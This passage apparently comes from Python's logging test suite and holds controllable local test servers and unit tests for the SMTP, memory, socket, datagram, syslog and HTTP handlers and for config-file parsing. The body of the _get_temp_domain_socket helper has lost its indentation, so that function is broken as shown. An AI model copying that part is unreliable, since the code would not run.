        if self._thread is not None:
            support.join_thread(self._thread)
            self._thread = None
        self.server_close()
        self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
    """
    An HTTP server which is controllable using :class:`ControlMixin`.
    :param addr: A tuple with the IP address and port to listen on.
    :param handler: A handler callable which will be called with a
                    single parameter - the request - in order to
                    process the request.
    :param poll_interval: The polling interval in seconds.
    :param log: Pass ``True`` to enable log messages.
    """
    def __init__(self, addr, handler, poll_interval=0.5,
                 log=False, sslctx=None):
        class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
            # Any do_GET/do_POST/... lookup is redirected to the single
            # process_request method via __getattr__, so one callable can
            # serve every HTTP verb.
            def __getattr__(self, name, default=None):
                if name.startswith('do_'):
                    return self.process_request
                raise AttributeError(name)
            def process_request(self):
                self.server._handler(self)
            def log_message(self, format, *args):
                if log:
                    super(DelegatingHTTPRequestHandler,
                          self).log_message(format, *args)
        HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
        ControlMixin.__init__(self, handler, poll_interval)
        self.sslctx = sslctx
    def get_request(self):
        try:
            sock, addr = self.socket.accept()
            # Optionally wrap the accepted socket for HTTPS tests.
            if self.sslctx:
                sock = self.sslctx.wrap_socket(sock, server_side=True)
        except OSError as e:
            # socket errors are silenced by the caller, print them here
            sys.stderr.write("Got an error:\n%s\n" % e)
            raise
        return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
    """
    A TCP server which is controllable using :class:`ControlMixin`.
    :param addr: A tuple with the IP address and port to listen on.
    :param handler: A handler callable which will be called with a single
                    parameter - the request - in order to process the request.
    :param poll_interval: The polling interval in seconds.
    :bind_and_activate: If True (the default), binds the server and starts it
                        listening. If False, you need to call
                        :meth:`server_bind` and :meth:`server_activate` at
                        some later time before calling :meth:`start`, so that
                        the server will set up the socket and listen on it.
    """
    # Allow quick re-binding of the same address across consecutive tests.
    allow_reuse_address = True
    def __init__(self, addr, handler, poll_interval=0.5,
                 bind_and_activate=True):
        class DelegatingTCPRequestHandler(StreamRequestHandler):
            def handle(self):
                # Delegate each connection to the server's callable.
                self.server._handler(self)
        ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
                                    bind_and_activate)
        ControlMixin.__init__(self, handler, poll_interval)
    def server_bind(self):
        super(TestTCPServer, self).server_bind()
        # Record the actual port bound (useful when port 0 was requested).
        self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
    """
    A UDP server which is controllable using :class:`ControlMixin`.
    :param addr: A tuple with the IP address and port to listen on.
    :param handler: A handler callable which will be called with a
                    single parameter - the request - in order to
                    process the request.
    :param poll_interval: The polling interval for shutdown requests,
                          in seconds.
    :bind_and_activate: If True (the default), binds the server and
                        starts it listening. If False, you need to
                        call :meth:`server_bind` and
                        :meth:`server_activate` at some later time
                        before calling :meth:`start`, so that the server will
                        set up the socket and listen on it.
    """
    def __init__(self, addr, handler, poll_interval=0.5,
                 bind_and_activate=True):
        class DelegatingUDPRequestHandler(DatagramRequestHandler):
            def handle(self):
                # Delegate each datagram to the server's callable.
                self.server._handler(self)
            def finish(self):
                data = self.wfile.getvalue()
                if data:
                    try:
                        super(DelegatingUDPRequestHandler, self).finish()
                    except OSError:
                        # Sending on a closed socket during shutdown is
                        # expected; only re-raise while still running.
                        if not self.server._closed:
                            raise
        ThreadingUDPServer.__init__(self, addr,
                                    DelegatingUDPRequestHandler,
                                    bind_and_activate)
        ControlMixin.__init__(self, handler, poll_interval)
        # Flag consulted by the handler's finish() above.
        self._closed = False
    def server_bind(self):
        super(TestUDPServer, self).server_bind()
        # Record the actual port bound (useful when port 0 was requested).
        self.port = self.socket.getsockname()[1]
    def server_close(self):
        super(TestUDPServer, self).server_close()
        self._closed = True
if hasattr(socket, "AF_UNIX"):
    # Unix-domain variants exist only where the platform supports AF_UNIX
    # sockets (i.e. not on Windows); the addr passed in is then a filesystem
    # path rather than a (host, port) tuple.
    class TestUnixStreamServer(TestTCPServer):
        address_family = socket.AF_UNIX
    class TestUnixDatagramServer(TestUDPServer):
        address_family = socket.AF_UNIX
# - end of server_helper section
class SMTPHandlerTest(BaseTest):
    """End-to-end test of SMTPHandler against the in-process TestSMTPServer."""
    # bpo-14314, bpo-19665, bpo-34092: don't wait forever
    TIMEOUT = support.LONG_TIMEOUT
    def test_basic(self):
        sockmap = {}
        # Port 0: let the OS choose; the server exposes the real port.
        server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
                                sockmap)
        server.start()
        addr = (support.HOST, server.port)
        h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
                                         timeout=self.TIMEOUT)
        self.assertEqual(h.toaddrs, ['you'])
        self.messages = []
        # Non-ASCII payload checks the handler's UTF-8 handling.
        r = logging.makeLogRecord({'msg': 'Hello \u2713'})
        self.handled = threading.Event()
        h.handle(r)
        # Wait (bounded) for the server thread to deliver to process_message.
        self.handled.wait(self.TIMEOUT)
        server.stop()
        self.assertTrue(self.handled.is_set())
        self.assertEqual(len(self.messages), 1)
        peer, mailfrom, rcpttos, data = self.messages[0]
        self.assertEqual(mailfrom, 'me')
        self.assertEqual(rcpttos, ['you'])
        self.assertIn('\nSubject: Log\n', data)
        self.assertTrue(data.endswith('\n\nHello \u2713'))
        h.close()
    def process_message(self, *args):
        # Called on the server thread with (peer, mailfrom, rcpttos, data).
        self.messages.append(args)
        self.handled.set()
class MemoryHandlerTest(BaseTest):
    """Tests for the MemoryHandler."""
    # Do not bother with a logger name group.
    expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
    def setUp(self):
        BaseTest.setUp(self)
        # Buffer up to 10 records, flushing on WARNING or above, into the
        # root handler installed by BaseTest.
        self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
                                                       self.root_hdlr)
        self.mem_logger = logging.getLogger('mem')
        self.mem_logger.propagate = 0
        self.mem_logger.addHandler(self.mem_hdlr)
    def tearDown(self):
        self.mem_hdlr.close()
        BaseTest.tearDown(self)
    def test_flush(self):
        # The memory handler flushes to its target handler based on specific
        # criteria (message count and message level).
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines([])
        self.mem_logger.info(self.next_message())
        self.assert_log_lines([])
        # This will flush because the level is >= logging.WARNING
        self.mem_logger.warning(self.next_message())
        lines = [
            ('DEBUG', '1'),
            ('INFO', '2'),
            ('WARNING', '3'),
        ]
        self.assert_log_lines(lines)
        # Two rounds: message counters continue at 4 and then at 14.
        for n in (4, 14):
            for i in range(9):
                self.mem_logger.debug(self.next_message())
            self.assert_log_lines(lines)
            # This will flush because it's the 10th message since the last
            # flush.
            self.mem_logger.debug(self.next_message())
            lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
            self.assert_log_lines(lines)
        # One more record below both thresholds: must stay buffered.
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines(lines)
    def test_flush_on_close(self):
        """
        Test that the flush-on-close configuration works as expected.
        """
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines([])
        self.mem_logger.info(self.next_message())
        self.assert_log_lines([])
        self.mem_logger.removeHandler(self.mem_hdlr)
        # Default behaviour is to flush on close. Check that it happens.
        self.mem_hdlr.close()
        lines = [
            ('DEBUG', '1'),
            ('INFO', '2'),
        ]
        self.assert_log_lines(lines)
        # Now configure for flushing not to be done on close.
        self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
                                                       self.root_hdlr,
                                                       False)
        self.mem_logger.addHandler(self.mem_hdlr)
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines(lines)  # no change
        self.mem_logger.info(self.next_message())
        self.assert_log_lines(lines)  # no change
        self.mem_logger.removeHandler(self.mem_hdlr)
        self.mem_hdlr.close()
        # assert that no new lines have been added
        self.assert_log_lines(lines)  # no change
class ExceptionFormatter(logging.Formatter):
    """A special exception formatter."""
    def formatException(self, ei):
        # ``ei`` is a (type, value, traceback) triple; report only the
        # name of the exception class.
        exc_type = ei[0]
        return "Got a [{}]".format(exc_type.__name__)
class ConfigFileTest(BaseTest):
    """Reading logging config from a .ini-style config file."""
    check_no_resource_warning = support.check_no_resource_warning
    expected_log_pat = r"^(\w+) \+\+ (\w+)$"
    # config0 is a standard configuration.
    config0 = """
    [loggers]
    keys=root
    [handlers]
    keys=hand1
    [formatters]
    keys=form1
    [logger_root]
    level=WARNING
    handlers=hand1
    [handler_hand1]
    class=StreamHandler
    level=NOTSET
    formatter=form1
    args=(sys.stdout,)
    [formatter_form1]
    format=%(levelname)s ++ %(message)s
    datefmt=
    """
    # config1 adds a little to the standard configuration.
    config1 = """
    [loggers]
    keys=root,parser
    [handlers]
    keys=hand1
    [formatters]
    keys=form1
    [logger_root]
    level=WARNING
    handlers=
    [logger_parser]
    level=DEBUG
    handlers=hand1
    propagate=1
    qualname=compiler.parser
    [handler_hand1]
    class=StreamHandler
    level=NOTSET
    formatter=form1
    args=(sys.stdout,)
    [formatter_form1]
    format=%(levelname)s ++ %(message)s
    datefmt=
    """
    # config1a moves the handler to the root.
    config1a = """
    [loggers]
    keys=root,parser
    [handlers]
    keys=hand1
    [formatters]
    keys=form1
    [logger_root]
    level=WARNING
    handlers=hand1
    [logger_parser]
    level=DEBUG
    handlers=
    propagate=1
    qualname=compiler.parser
    [handler_hand1]
    class=StreamHandler
    level=NOTSET
    formatter=form1
    args=(sys.stdout,)
    [formatter_form1]
    format=%(levelname)s ++ %(message)s
    datefmt=
    """
    # config2 has a subtle configuration error that should be reported
    config2 = config1.replace("sys.stdout", "sys.stbout")
    # config3 has a less subtle configuration error
    config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
    # config4 specifies a custom formatter class to be loaded
    config4 = """
    [loggers]
    keys=root
    [handlers]
    keys=hand1
    [formatters]
    keys=form1
    [logger_root]
    level=NOTSET
    handlers=hand1
    [handler_hand1]
    class=StreamHandler
    level=NOTSET
    formatter=form1
    args=(sys.stdout,)
    [formatter_form1]
    class=""" + __name__ + """.ExceptionFormatter
    format=%(levelname)s:%(name)s:%(message)s
    datefmt=
    """
    # config5 specifies a custom handler class to be loaded
    config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
    # config6 uses ', ' delimiters in the handlers and formatters sections
    config6 = """
    [loggers]
    keys=root,parser
    [handlers]
    keys=hand1, hand2
    [formatters]
    keys=form1, form2
    [logger_root]
    level=WARNING
    handlers=
    [logger_parser]
    level=DEBUG
    handlers=hand1
    propagate=1
    qualname=compiler.parser
    [handler_hand1]
    class=StreamHandler
    level=NOTSET
    formatter=form1
    args=(sys.stdout,)
    [handler_hand2]
    class=StreamHandler
    level=NOTSET
    formatter=form1
    args=(sys.stderr,)
    [formatter_form1]
    format=%(levelname)s ++ %(message)s
    datefmt=
    [formatter_form2]
    format=%(message)s
    datefmt=
    """
    # config7 adds a compiler logger, and uses kwargs instead of args.
    config7 = """
    [loggers]
    keys=root,parser,compiler
    [handlers]
    keys=hand1
    [formatters]
    keys=form1
    [logger_root]
    level=WARNING
    handlers=hand1
    [logger_compiler]
    level=DEBUG
    handlers=
    propagate=1
    qualname=compiler
    [logger_parser]
    level=DEBUG
    handlers=
    propagate=1
    qualname=compiler.parser
    [handler_hand1]
    class=StreamHandler
    level=NOTSET
    formatter=form1
    kwargs={'stream': sys.stdout,}
    [formatter_form1]
    format=%(levelname)s ++ %(message)s
    datefmt=
    """
    # config 8, check for resource warning
    config8 = r"""
    [loggers]
    keys=root
    [handlers]
    keys=file
    [formatters]
    keys=
    [logger_root]
    level=DEBUG
    handlers=file
    [handler_file]
    class=FileHandler
    level=DEBUG
    args=("{tempfile}",)
    """
    disable_test = """
    [loggers]
    keys=root
    [handlers]
    keys=screen
    [formatters]
    keys=
    [logger_root]
    level=DEBUG
    handlers=screen
    [handler_screen]
    level=DEBUG
    class=StreamHandler
    args=(sys.stdout,)
    formatter=
    """
    def apply_config(self, conf, **kwargs):
        """Dedent *conf* and feed it to logging.config.fileConfig()."""
        file = io.StringIO(textwrap.dedent(conf))
        logging.config.fileConfig(file, **kwargs)
    def test_config0_ok(self):
        # A simple config file which overrides the default settings.
        with support.captured_stdout() as output:
            self.apply_config(self.config0)
            logger = logging.getLogger()
            # Won't output anything
            logger.info(self.next_message())
            # Outputs a message
            logger.error(self.next_message())
            self.assert_log_lines([
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
    def test_config0_using_cp_ok(self):
        # A simple config file which overrides the default settings.
        with support.captured_stdout() as output:
            file = io.StringIO(textwrap.dedent(self.config0))
            cp = configparser.ConfigParser()
            cp.read_file(file)
            logging.config.fileConfig(cp)
            logger = logging.getLogger()
            # Won't output anything
            logger.info(self.next_message())
            # Outputs a message
            logger.error(self.next_message())
            self.assert_log_lines([
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
    def test_config1_ok(self, config=config1):
        # A config file defining a sub-parser as well.
        with support.captured_stdout() as output:
            self.apply_config(config)
            logger = logging.getLogger("compiler.parser")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
    def test_config2_failure(self):
        # A simple config file which overrides the default settings.
        self.assertRaises(Exception, self.apply_config, self.config2)
    def test_config3_failure(self):
        # A simple config file which overrides the default settings.
        self.assertRaises(Exception, self.apply_config, self.config3)
    def test_config4_ok(self):
        # A config file specifying a custom formatter class.
        with support.captured_stdout() as output:
            self.apply_config(self.config4)
            logger = logging.getLogger()
            try:
                raise RuntimeError()
            except RuntimeError:
                logging.exception("just testing")
            sys.stdout.seek(0)
            self.assertEqual(output.getvalue(),
                "ERROR:root:just testing\nGot a [RuntimeError]\n")
            # Original logger output is empty
            self.assert_log_lines([])
    def test_config5_ok(self):
        self.test_config1_ok(config=self.config5)
    def test_config6_ok(self):
        self.test_config1_ok(config=self.config6)
    def test_config7_ok(self):
        with support.captured_stdout() as output:
            self.apply_config(self.config1a)
            logger = logging.getLogger("compiler.parser")
            # See issue #11424. compiler-hyphenated sorts
            # between compiler and compiler.xyz and this
            # was preventing compiler.xyz from being included
            # in the child loggers of compiler because of an
            # overzealous loop termination condition.
            hyphenated = logging.getLogger('compiler-hyphenated')
            # All will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            hyphenated.critical(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
                ('CRITICAL', '3'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
        with support.captured_stdout() as output:
            self.apply_config(self.config7)
            logger = logging.getLogger("compiler.parser")
            self.assertFalse(logger.disabled)
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            logger = logging.getLogger("compiler.lexer")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            # Will not appear
            hyphenated.critical(self.next_message())
            self.assert_log_lines([
                ('INFO', '4'),
                ('ERROR', '5'),
                ('INFO', '6'),
                ('ERROR', '7'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
    def test_config8_ok(self):
        def cleanup(h1, fn):
            h1.close()
            os.remove(fn)
        with self.check_no_resource_warning():
            fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
            os.close(fd)
            # Replace single backslash with double backslash in windows
            # to avoid unicode error during string formatting
            if os.name == "nt":
                fn = fn.replace("\\", "\\\\")
            config8 = self.config8.format(tempfile=fn)
            # Applying the config twice makes the first FileHandler get
            # replaced; the surrounding context fails the test if that
            # first handler's file is leaked (not closed).
            self.apply_config(config8)
            self.apply_config(config8)
        handler = logging.root.handlers[0]
        self.addCleanup(cleanup, handler, fn)
    def test_logger_disabling(self):
        self.apply_config(self.disable_test)
        logger = logging.getLogger('some_pristine_logger')
        self.assertFalse(logger.disabled)
        self.apply_config(self.disable_test)
        self.assertTrue(logger.disabled)
        self.apply_config(self.disable_test, disable_existing_loggers=False)
        self.assertFalse(logger.disabled)
    def test_config_set_handler_names(self):
        test_config = """
        [loggers]
        keys=root
        [handlers]
        keys=hand1
        [formatters]
        keys=form1
        [logger_root]
        handlers=hand1
        [handler_hand1]
        class=StreamHandler
        formatter=form1
        [formatter_form1]
        format=%(levelname)s ++ %(message)s
        """
        self.apply_config(test_config)
        self.assertEqual(logging.getLogger().handlers[0].name, 'hand1')
    def test_defaults_do_no_interpolation(self):
        """bpo-33802 defaults should not get interpolated"""
        ini = textwrap.dedent("""
            [formatters]
            keys=default
            [formatter_default]
            [handlers]
            keys=console
            [handler_console]
            class=logging.StreamHandler
            args=tuple()
            [loggers]
            keys=root
            [logger_root]
            formatter=default
            handlers=console
            """).strip()
        fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
        try:
            os.write(fd, ini.encode('ascii'))
            os.close(fd)
            logging.config.fileConfig(
                fn,
                defaults=dict(
                    version=1,
                    disable_existing_loggers=False,
                    formatters={
                        "generic": {
                            "format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
                            "datefmt": "[%Y-%m-%d %H:%M:%S %z]",
                            "class": "logging.Formatter"
                        },
                    },
                )
            )
        finally:
            os.unlink(fn)
class SocketHandlerTest(BaseTest):
    """Test for SocketHandler objects."""
    server_class = TestTCPServer
    address = ('localhost', 0)
    def setUp(self):
        """Set up a TCP server to receive log messages, and a SocketHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        # Issue #29177: deal with errors that happen during setup
        self.server = self.sock_hdlr = self.server_exception = None
        try:
            self.server = server = self.server_class(self.address,
                                                     self.handle_socket, 0.01)
            server.start()
            # Uncomment next line to test error recovery in setUp()
            # raise OSError('dummy error raised')
        except OSError as e:
            # Remember the failure; tests skip themselves when set.
            self.server_exception = e
            return
        server.ready.wait()
        hcls = logging.handlers.SocketHandler
        if isinstance(server.server_address, tuple):
            self.sock_hdlr = hcls('localhost', server.port)
        else:
            # Unix domain socket: the address is a filesystem path.
            self.sock_hdlr = hcls(server.server_address, None)
        self.log_output = ''
        self.root_logger.removeHandler(self.root_logger.handlers[0])
        self.root_logger.addHandler(self.sock_hdlr)
        # Released once per record received by handle_socket().
        self.handled = threading.Semaphore(0)
    def tearDown(self):
        """Shutdown the TCP server."""
        try:
            if self.sock_hdlr:
                self.root_logger.removeHandler(self.sock_hdlr)
                self.sock_hdlr.close()
            if self.server:
                self.server.stop()
        finally:
            BaseTest.tearDown(self)
    def handle_socket(self, request):
        # SocketHandler frames each record as a 4-byte big-endian length
        # followed by a pickled LogRecord dict; read frames until EOF.
        conn = request.connection
        while True:
            chunk = conn.recv(4)
            if len(chunk) < 4:
                break
            slen = struct.unpack(">L", chunk)[0]
            chunk = conn.recv(slen)
            while len(chunk) < slen:
                chunk = chunk + conn.recv(slen - len(chunk))
            obj = pickle.loads(chunk)
            record = logging.makeLogRecord(obj)
            self.log_output += record.msg + '\n'
            self.handled.release()
    def test_output(self):
        # The log message sent to the SocketHandler is properly received.
        if self.server_exception:
            self.skipTest(self.server_exception)
        logger = logging.getLogger("tcp")
        logger.error("spam")
        self.handled.acquire()
        logger.debug("eggs")
        self.handled.acquire()
        self.assertEqual(self.log_output, "spam\neggs\n")
    def test_noserver(self):
        if self.server_exception:
            self.skipTest(self.server_exception)
        # Avoid timing-related failures due to SocketHandler's own hard-wired
        # one-second timeout on socket.create_connection() (issue #16264).
        self.sock_hdlr.retryStart = 2.5
        # Kill the server
        self.server.stop()
        # The logging call should try to connect, which should fail
        try:
            raise RuntimeError('Deliberate mistake')
        except RuntimeError:
            self.root_logger.exception('Never sent')
        self.root_logger.error('Never sent, either')
        now = time.time()
        # The handler schedules a retry in the future; wait past it and
        # log again to exercise the reconnect path.
        self.assertGreater(self.sock_hdlr.retryTime, now)
        time.sleep(self.sock_hdlr.retryTime - now + 0.001)
        self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
    """Test for SocketHandler with unix sockets."""
    if hasattr(socket, "AF_UNIX"):
        # Guarded so the class body still evaluates on platforms without
        # AF_UNIX (the decorator only skips the tests, not the body).
        server_class = TestUnixStreamServer
    def setUp(self):
        # override the definition in the base class
        self.address = _get_temp_domain_socket()
        SocketHandlerTest.setUp(self)
    def tearDown(self):
        SocketHandlerTest.tearDown(self)
        # Remove the socket file created for this test.
        support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
    """Test for DatagramHandler."""
    server_class = TestUDPServer
    address = ('localhost', 0)
    def setUp(self):
        """Set up a UDP server to receive log messages, and a DatagramHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        # Issue #29177: deal with errors that happen during setup
        self.server = self.sock_hdlr = self.server_exception = None
        try:
            self.server = server = self.server_class(self.address,
                                                     self.handle_datagram, 0.01)
            server.start()
            # Uncomment next line to test error recovery in setUp()
            # raise OSError('dummy error raised')
        except OSError as e:
            self.server_exception = e
            return
        server.ready.wait()
        hcls = logging.handlers.DatagramHandler
        if isinstance(server.server_address, tuple):
            self.sock_hdlr = hcls('localhost', server.port)
        else:
            # Unix domain socket: the address is a filesystem path.
            self.sock_hdlr = hcls(server.server_address, None)
        self.log_output = ''
        self.root_logger.removeHandler(self.root_logger.handlers[0])
        self.root_logger.addHandler(self.sock_hdlr)
        self.handled = threading.Event()
    def tearDown(self):
        """Shutdown the UDP server."""
        try:
            if self.server:
                self.server.stop()
            if self.sock_hdlr:
                self.root_logger.removeHandler(self.sock_hdlr)
                self.sock_hdlr.close()
        finally:
            BaseTest.tearDown(self)
    def handle_datagram(self, request):
        # Each datagram is a 4-byte length prefix followed by a pickled
        # LogRecord dict; skip the prefix and unpickle the rest.
        slen = struct.pack('>L', 0) # length of prefix
        packet = request.packet[len(slen):]
        obj = pickle.loads(packet)
        record = logging.makeLogRecord(obj)
        self.log_output += record.msg + '\n'
        self.handled.set()
    def test_output(self):
        # The log message sent to the DatagramHandler is properly received.
        if self.server_exception:
            self.skipTest(self.server_exception)
        logger = logging.getLogger("udp")
        logger.error("spam")
        self.handled.wait()
        self.handled.clear()
        logger.error("eggs")
        self.handled.wait()
        self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
    """Test for DatagramHandler using Unix sockets."""
    if hasattr(socket, "AF_UNIX"):
        # Guarded so the class body still evaluates on platforms without
        # AF_UNIX (the decorator only skips the tests, not the body).
        server_class = TestUnixDatagramServer
    def setUp(self):
        # override the definition in the base class
        self.address = _get_temp_domain_socket()
        DatagramHandlerTest.setUp(self)
    def tearDown(self):
        DatagramHandlerTest.tearDown(self)
        # Remove the socket file created for this test.
        support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
    """Test for SysLogHandler using UDP."""
    server_class = TestUDPServer
    address = ('localhost', 0)
    def setUp(self):
        """Set up a UDP server to receive log messages, and a SysLogHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        # Issue #29177: deal with errors that happen during setup
        self.server = self.sl_hdlr = self.server_exception = None
        try:
            self.server = server = self.server_class(self.address,
                                                     self.handle_datagram, 0.01)
            server.start()
            # Uncomment next line to test error recovery in setUp()
            # raise OSError('dummy error raised')
        except OSError as e:
            self.server_exception = e
            return
        server.ready.wait()
        hcls = logging.handlers.SysLogHandler
        if isinstance(server.server_address, tuple):
            self.sl_hdlr = hcls((server.server_address[0], server.port))
        else:
            # Unix domain socket: the address is a filesystem path.
            self.sl_hdlr = hcls(server.server_address)
        self.log_output = ''
        self.root_logger.removeHandler(self.root_logger.handlers[0])
        self.root_logger.addHandler(self.sl_hdlr)
        self.handled = threading.Event()
    def tearDown(self):
        """Shutdown the server."""
        try:
            if self.server:
                self.server.stop()
            if self.sl_hdlr:
                self.root_logger.removeHandler(self.sl_hdlr)
                self.sl_hdlr.close()
        finally:
            BaseTest.tearDown(self)
    def handle_datagram(self, request):
        # The whole datagram is the syslog message (no framing); keep
        # only the latest one.
        self.log_output = request.packet
        self.handled.set()
    def test_output(self):
        if self.server_exception:
            self.skipTest(self.server_exception)
        # The log message sent to the SysLogHandler is properly received.
        logger = logging.getLogger("slh")
        logger.error("sp\xe4m")
        self.handled.wait()
        # '<11>' is the syslog PRI prefix; by default the handler appends
        # a NUL and UTF-8-encodes the message.
        self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
        self.handled.clear()
        # Without the trailing NUL.
        self.sl_hdlr.append_nul = False
        logger.error("sp\xe4m")
        self.handled.wait()
        self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
        self.handled.clear()
        # With an ident string prepended after the PRI part.
        self.sl_hdlr.ident = "h\xe4m-"
        logger.error("sp\xe4m")
        self.handled.wait()
        self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
    """Test for SysLogHandler with Unix sockets."""
    if hasattr(socket, "AF_UNIX"):
        # Guarded so the class body still evaluates on platforms without
        # AF_UNIX (the decorator only skips the tests, not the body).
        server_class = TestUnixDatagramServer
    def setUp(self):
        # override the definition in the base class
        self.address = _get_temp_domain_socket()
        SysLogHandlerTest.setUp(self)
    def tearDown(self):
        SysLogHandlerTest.tearDown(self)
        # Remove the socket file created for this test.
        support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
                     'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
    """Test for SysLogHandler with IPv6 host."""
    server_class = TestUDPServer
    address = ('::1', 0)
    def setUp(self):
        # NOTE: mutates the shared server_class's class attribute;
        # tearDown puts it back to AF_INET.
        self.server_class.address_family = socket.AF_INET6
        super(IPv6SysLogHandlerTest, self).setUp()
    def tearDown(self):
        self.server_class.address_family = socket.AF_INET
        super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
    """Test for HTTPHandler."""
    def setUp(self):
        """Set up an HTTP server to receive log messages, and a HTTPHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        self.handled = threading.Event()
    def handle_request(self, request):
        # Runs on the server thread for each request: capture the method,
        # parsed path/query and (for POST) the body so test_output() can
        # inspect them, then acknowledge and signal the test thread.
        self.command = request.command
        self.log_data = urlparse(request.path)
        if self.command == 'POST':
            try:
                rlen = int(request.headers['Content-Length'])
                self.post_data = request.rfile.read(rlen)
            except Exception:
                # Missing/invalid Content-Length: record that no body was
                # read rather than crashing the server thread. (Was a bare
                # 'except:', which would also have swallowed SystemExit
                # and KeyboardInterrupt.)
                self.post_data = None
        request.send_response(200)
        request.end_headers()
        self.handled.set()
    def test_output(self):
        # The log message sent to the HTTPHandler is properly received,
        # over plain HTTP and (when ssl is available) over HTTPS.
        logger = logging.getLogger("http")
        root_logger = self.root_logger
        root_logger.removeHandler(self.root_logger.handlers[0])
        for secure in (False, True):
            addr = ('localhost', 0)
            if secure:
                try:
                    import ssl
                except ImportError:
                    sslctx = None
                else:
                    here = os.path.dirname(__file__)
                    localhost_cert = os.path.join(here, "keycert.pem")
                    sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
                    sslctx.load_cert_chain(localhost_cert)
                    context = ssl.create_default_context(cafile=localhost_cert)
            else:
                sslctx = None
                context = None
            self.server = server = TestHTTPServer(addr, self.handle_request,
                                                    0.01, sslctx=sslctx)
            server.start()
            server.ready.wait()
            host = 'localhost:%d' % server.server_port
            secure_client = secure and sslctx
            self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
                                                       secure=secure_client,
                                                       context=context,
                                                       credentials=('foo', 'bar'))
            self.log_data = None
            root_logger.addHandler(self.h_hdlr)
            for method in ('GET', 'POST'):
                self.h_hdlr.method = method
                self.handled.clear()
                msg = "sp\xe4m"
                logger.error(msg)
                self.handled.wait()
                self.assertEqual(self.log_data.path, '/frob')
                self.assertEqual(self.command, method)
                # GET puts the record in the query string, POST in the body.
                if method == 'GET':
                    d = parse_qs(self.log_data.query)
                else:
                    d = parse_qs(self.post_data.decode('utf-8'))
                self.assertEqual(d['name'], ['http'])
                self.assertEqual(d['funcName'], ['test_output'])
                self.assertEqual(d['msg'], [msg])
            self.server.stop()
            self.root_logger.removeHandler(self.h_hdlr)
            self.h_hdlr.close()
class MemoryTest(BaseTest):
    """Test memory persistence of logger objects."""
    def setUp(self):
        """Create a dict to remember potentially destroyed objects."""
        BaseTest.setUp(self)
        self._survivors = {}
    def _watch_for_survival(self, *args):
        """Watch the given objects for survival, by creating weakrefs to
        them."""
        for watched in args:
            self._survivors[(id(watched), repr(watched))] = weakref.ref(watched)
    def _assertTruesurvival(self):
        """Assert that all objects watched for survival have survived."""
        # Break reference cycles first, so anything kept alive only by a
        # cycle is actually collected before we look at the weakrefs.
        gc.collect()
        dead = [repr_ for (_, repr_), ref in self._survivors.items()
                if ref() is None]
        if dead:
            self.fail("%d objects should have survived "
                "but have been destroyed: %s" % (len(dead), ", ".join(dead)))
    def test_persistent_loggers(self):
        # Logger objects are persistent and retain their configuration, even
        # if visible references are destroyed.
        self.root_logger.setLevel(logging.INFO)
        foo = logging.getLogger("foo")
        self._watch_for_survival(foo)
        foo.setLevel(logging.DEBUG)
        self.root_logger.debug(self.next_message())
        foo.debug(self.next_message())
        self.assert_log_lines([
            ('foo', 'DEBUG', '2'),
        ])
        del foo
        # foo has survived.
        self._assertTruesurvival()
        # foo has retained its settings.
